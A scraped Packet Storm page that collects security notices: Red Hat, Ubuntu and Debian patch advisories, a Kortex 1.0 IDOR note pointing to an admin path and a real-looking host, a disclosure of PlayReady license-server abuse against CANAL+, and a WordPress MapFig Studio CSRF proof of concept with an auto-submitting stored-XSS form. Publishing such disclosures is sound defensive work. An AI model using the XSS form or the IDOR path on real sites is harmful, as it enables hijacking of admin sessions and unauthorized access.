Red Hat Security Advisory 2024-5315-03 - An update for open-vm-tools is now available for Red Hat Enterprise Linux 7.7 Advanced Update Support. Issues addressed include a bypass vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5315.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: open-vm-tools security updateAdvisory ID:        RHSA-2024:5315-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5315Issue date:         2024-08-14Revision:           03CVE Names:          CVE-2023-20900====================================================================Summary: An update for open-vm-tools is now available for Red Hat Enterprise Linux 7.7 Advanced Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The Open Virtual Machine Tools are the open source implementation of the VMware Tools. They are a set of guest operating system virtualization components that enhance performance and user experience of virtual machines.Security Fix(es):* open-vm-tools: SAML token signature bypass (CVE-2023-20900)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-20900References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2236542

Red Hat Security Advisory 2024-5315-03

Kortex version 1.0 suffers from an insecure direct object reference vulnerability.

**Kortex 1.0 Insecure Direct Object Reference**

Posted Aug 14, 2024

Authored by indoushka

Kortex version 1.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | b5387d8bfce8e3033d7413641e3e9b7894ff5bafea17fd748b642abf24fa1ae8

Download | Favorite | View

**Kortex 1.0 Insecure Direct Object Reference**

    ====================================================================================================================================| # Title     : Kortex v1.0 IDOR Vulnerability                                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.mayurik.com/source-code/P5339/best-free-law-office-management-software                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : /control/data-table.php[+] https://www/ahmedshawki2110.freewebhostmost.com/control/data-table.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,399)
*   Arbitrary (16,878)
*   BBS (2,859)
*   Bypass (1,863)
*   CGI (1,033)
*   Code Execution (7,813)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,396)
*   DoS (25,082)
*   Encryption (2,389)
*   Exploit (53,197)
*   File Inclusion (4,262)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (915)
*   Java (3,144)
*   JavaScript (896)
*   Kernel (7,220)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,725)
*   Python (1,641)
*   Remote (31,657)
*   Root (3,636)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,027)
*   Shell (3,275)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,277)
*   SQL Injection (16,610)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (669)
*   Vulnerability (32,987)
*   Web (9,965)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,254)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,099)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,756)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,521)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,747)
*   UNIX (9,436)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Kortex 1.0 Insecure Direct Object Reference

Red Hat Security Advisory 2024-5314-03 - Red Hat OpenShift Virtualization release 4.13.10 is now available with updates to packages and images that fix several bugs and add enhancements.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5314.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: OpenShift Virtualization 4.13.10 Images security updateAdvisory ID:        RHSA-2024:5314-03Product:            OpenShift VirtualizationAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5314Issue date:         2024-08-14Revision:           03CVE Names:          CVE-2023-45857====================================================================Summary: Red Hat OpenShift Virtualization release 4.13.10 is now available with updates to packages and images that fix several bugs and add enhancements.Red Hat Product Security has rated this update as having a security impact ofModerate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVElink(s) in the References section.Description:OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform.This advisory contains OpenShift Virtualization 4.13.10 images.Security Fix(es):* axios: exposure of confidential data stored in cookies (CVE-2023-45857)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-45857References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2248979https://issues.redhat.com/browse/CNV-38482https://issues.redhat.com/browse/CNV-41951https://issues.redhat.com/browse/CNV-45277

Red Hat Security Advisory 2024-5314-03

Red Hat Security Advisory 2024-5312-03 - An update for krb5 is now available for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5312.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: krb5 security updateAdvisory ID:        RHSA-2024:5312-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5312Issue date:         2024-08-14Revision:           03CVE Names:          CVE-2024-37370====================================================================Summary: An update for krb5 is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Kerberos is a network authentication system, which can improve the security of your network by eliminating the insecure practice of sending passwords over the network in unencrypted form. It allows clients and servers to authenticate to each other with the help of a trusted third party, the Kerberos key distribution center (KDC).Security Fix(es):* krb5: GSS message token handling (CVE-2024-37371)* krb5: GSS message token handling (CVE-2024-37370)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-37370References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2294676https://bugzilla.redhat.com/show_bug.cgi?id=2294677

Red Hat Security Advisory 2024-5312-03

Red Hat Security Advisory 2024-5309-03 - An update for python-urllib3 is now available for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5309.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: python-urllib3 security updateAdvisory ID:        RHSA-2024:5309-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5309Issue date:         2024-08-14Revision:           03CVE Names:          CVE-2024-37891====================================================================Summary: An update for python-urllib3 is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The python-urllib3 package provides the Python HTTP module with connection pooling and file POST abilities.Security Fix(es):* urllib3: proxy-authorization request header is not stripped during cross-origin redirects (CVE-2024-37891)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-37891References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2292788

Red Hat Security Advisory 2024-5309-03

Red Hat Security Advisory 2024-5306-03 - An update for orc is now available for Red Hat Enterprise Linux 8. Issues addressed include a buffer overflow vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5306.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: orc security updateAdvisory ID:        RHSA-2024:5306-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5306Issue date:         2024-08-14Revision:           03CVE Names:          CVE-2024-40897====================================================================Summary: An update for orc is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Orc is a library and set of tools for compiling and executing very simple programs that operate on arrays of data.  The \"language\" is a generic assembly language that represents many of the features available in SIMD architectures, including saturated addition and subtraction, and many arithmetic operations.Security Fix(es):* orc: Stack-based buffer overflow vulnerability in ORC (CVE-2024-40897)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-40897References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2300010

Red Hat Security Advisory 2024-5306-03

Ubuntu Security Notice 6954-1 - Markus Frank and Fiona Ebner discovered that QEMU did not properly handle certain memory operations, leading to a NULL pointer dereference. An authenticated user could potentially use this issue to cause a denial of service. Xiao Lei discovered that QEMU did not properly handle certain memory operations when specific features were enabled, which could lead to a stack overflow. An attacker could potentially use this issue to leak sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6954-1  
August 13, 2024

qemu vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in QEMU.

Software Description:  
- qemu: Machine emulator and virtualizer

Details:

Markus Frank and Fiona Ebner discovered that QEMU did not properly  
handle certain memory operations, leading to a NULL pointer dereference.  
An authenticated user could potentially use this issue to cause a denial  
of service. (CVE-2023-6683)

Xiao Lei discovered that QEMU did not properly handle certain memory  
operations when specific features were enabled, which could lead to a  
stack overflow. An attacker could potentially use this issue to leak  
sensitive information. (CVE-2023-6693)

It was discovered that QEMU had an integer underflow vulnerability in  
the TI command, which would result in a buffer overflow. An attacker  
could potentially use this issue to cause a denial of service.  
(CVE-2024-24474)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS  
   qemu-system                     1:6.2+dfsg-2ubuntu6.22  
   qemu-system-arm                 1:6.2+dfsg-2ubuntu6.22  
   qemu-system-mips                1:6.2+dfsg-2ubuntu6.22  
   qemu-system-misc                1:6.2+dfsg-2ubuntu6.22  
   qemu-system-ppc                 1:6.2+dfsg-2ubuntu6.22  
   qemu-system-s390x               1:6.2+dfsg-2ubuntu6.22  
   qemu-system-sparc               1:6.2+dfsg-2ubuntu6.22  
   qemu-system-x86-xen             1:6.2+dfsg-2ubuntu6.22

After a standard system update you need to restart all QEMU virtual  
machines to make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6954-1  
   CVE-2023-6683, CVE-2023-6693, CVE-2024-24474

Package Information:  
   https://launchpad.net/ubuntu/+source/qemu/1:6.2+dfsg-2ubuntu6.22

Ubuntu Security Notice USN-6954-1

WordPress MapFig Studio plugin versions 0.2.1 and below suffer from cross site request forgery and cross site scripting vulnerabilities.

    # Exploit Title: MapFig Studio <= 0.2.1 - Stored XSS via CSRF# Date: 15-04-2024# Exploit Author: Vuln Seeker Cybersecurity Team# Vendor Homepage: https://wordpress.org/plugins/mapfig-studio/# Version: <= 0.2.1# Tested on: Firefox# Contact me: vulns@vulnseeker.orgDescriptionThe plugin does not have CSRF check in some places, and is missingsanitisation as well as escaping, which could allow attackers to makelogged in admin add Stored XSS payloads via a CSRF attackProof of ConceptHave a logged in admin open a page containing:<html>  <body>    <form action="http://example.com/wp-admin/admin.php?page=studio_settings"method="POST">      <input type="hidden" name="studio_apikey"value=""><script>alert(1)</script>" />      <input type="hidden" name="studio_url"value=""><script>alert(1)</script>" />      <input type="hidden" name="save" value="Save!" />      <input type="submit" value="Submit request" />    </form>    <script>      history.pushState('', '', '/');      document.forms[0].submit();    </script>  </body></html>Reference:https://wpscan.com/vulnerability/0346b62c-a856-4554-a24a-ef2c2943bda9/

WordPress MapFig Studio 0.2.1 Cross Site Request Forgery / Cross Site Scripting

Debian Linux Security Advisory 5743-2 - Multiple cross-site scripting vulnerabilities were discovered in RoundCube webmail.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5743-2                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
August 13, 2024                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : roundcube  
CVE ID         : CVE-2024-42008 CVE-2024-42009 CVE-2024-42010

Multiple cross-site scripting vulnerabilities were discovered in  
RoundCube webmail.

For the oldstable distribution (bullseye), these problems have been fixed in  
version 1.4.15+dfsg.1-1+deb11u4.

For the stable distribution (bookworm), these problems have already been  
addressed in DSA-5743-1. The initial fixes introduced a regression in  
print previews, which has now been addressed in 1.6.5+dfsg-1+deb12u4.

We recommend that you upgrade your roundcube packages.

For the detailed security status of roundcube please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/roundcube

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAma7AK0ACgkQEMKTtsN8  
TjaCLhAAj9ooFCqkks/zX1SUM0VpGOKCUwkUiAotKggBJnAOhCAeLJ++YXJeFpTx  
h8Muye2jgC1BjpmA0HsdjtHDUOEWL73n2eG3obHEQG+WytJISfz7LyoFxJPBDZUA  
bKs0+MMg8wA8VJJWZ8PIoYm4DaTjgVkiaCQQxJhRfZw/LNGFYN9Y9yEL2XrncR8I  
fZoug/Iyl4+qC8zr2iYWHFs2TMZXMbYNLFRDY06J5XYFuQ0QPa7KbkN8UvXRNeK4  
DOTrkQKeauJHmWl9gfJ9U8w+TYo8mYwU38NoEm/1x0lhqMk/A9KMyROJPuZmCD+R  
QWMzULFdqLduvp+iMr0MSGeLnvzuX6AXME8K7JnMiELOmXWCVNAlTNFnmKBftUOZ  
mh8MKlNkaGyNO2G9PGIeCNURGwI8NIN0UABZN9h289mn0QM195MuLZN/OZtUBH2s  
FU9VAXg2Lw/WKaVj9gndSAv3aN68YN8efuXeTVnPTQaSdHsnBR0fT0yqZd1BWMFy  
mq6oYxZGXfRgkb6/KwB/oY3dutXxtUj0GKdC7cQIG2oMyEcFN3Q5yG8oPHZHzgwJ  
UYWwA46Jwhy1kRcYmukL+dGtwWsSM7yW6zjV8ifMxJ4zGMJjmMkPSWdKzG/otn7K  
oVu/AMHnfCRY/RmXbg1uyuCmjamDZce1fPlDTuvHW+m0AHGvYqU=  
=Y9uW  
-----END PGP SIGNATURE-----

Debian Security Advisory 5743-2

There is an architectural and design issue in Microsoft's PlayReady which can be successfully exploited to gain access to license server by arbitrary clients. The problem has its origin in flat certificate namespace / reliance on a single root key in PlayReady along with no authentication at the license server end by default (deemed as no bug by Microsoft).

Hello All,

There is an architectural / design issue of PlayReady, which can be  
successfully exploited to gain access to license server by arbitrary  
clients. The problem has its origin in flat certificate namespace /  
reliance on a single root key in PlayReady along no auth at license  
server end by default (deemed as no bug by Microsoft).

PlayReady client certificates encountered in Windows 10 / 11 and  
CANAL+ STB device environments share a common feature. They are all  
digitally signed by the so called WMRMECC256 Key identified by the  
following public component:

    C8 B6 AF 16 EE 94 1A AD AA 53 89 B4 AF 2C 10 E3  
    56 BE 42 AF 17 5E F3 FA CE 93 25 4E 7B 0B 3D 9B  
    98 2B 27 B5 CB 23 41 32 6E 56 AA 85 7D BF D5 C6  
    34 CE 2C F9 EA 74 FC A8 F2 AF 59 57 EF EE A5 62

Such an approach implicates the following:  
- all PlayReady license servers deployed across different content  
providers need to embed private key of WMRMECC256 Key for client  
identity verification purposes. Compromise of one provider can  
potentially impact other providers too,  
- client identities originating from different environments are to be  
successfully validated by PlayReady license server as long as the  
client identity certificate chain is signed by WMRMECC256 Key.

We exploited the above flat certificate namespace / reliance on a  
single root key in PlayReady in the context of CANAL+ environment.

On Aug 12, 2024, the compromised STB certificate used by us to  
demonstrate the possibility of a massive piracy in CANAL+ environment  
has been finally revoked.

Compromised device certificate revocation hasn't addressed the core of  
the issue though (no client auth at PlayReady license server end). It  
took us less than an hour to change the code of our POC (PlayReady  
Toolkit) in order to make it work again, successfully obtain licenses  
for content and download arbitrary movies from CANAL+ VOD library, all  
regardless of the certificate revocation.

We imported the identity file generated for Windows 10 PlayReady  
client to it (some arbitrary identity from May 2024) along private  
signing and encryption keys corresponding to it and obtained through  
attacks #3 and #4 (complete client identity compromise).

The end result was a fully functional POC and Windows PlayReady client  
working in what one would assume to be an isolated PlayReady  
environment of CANAL+ set-top-boxes. Microsoft PlayReady license  
server successfully accepted and processed identity certificate chain  
with obfuscated keys and leaf certs specific to Windows environment.

Such an operation of PlayReady license server makes any certificate  
revocations to be rather irrelevant (vide hundreds of millions of  
identities associated with Windows PlayReady clients).

Thank you.

Best Regards,  
Adam Gowdiak

----------------------------------  
Security Explorations -  
AG Security Research Lab  
https://security-explorations.com  
----------------------------------

Source

Packet Storm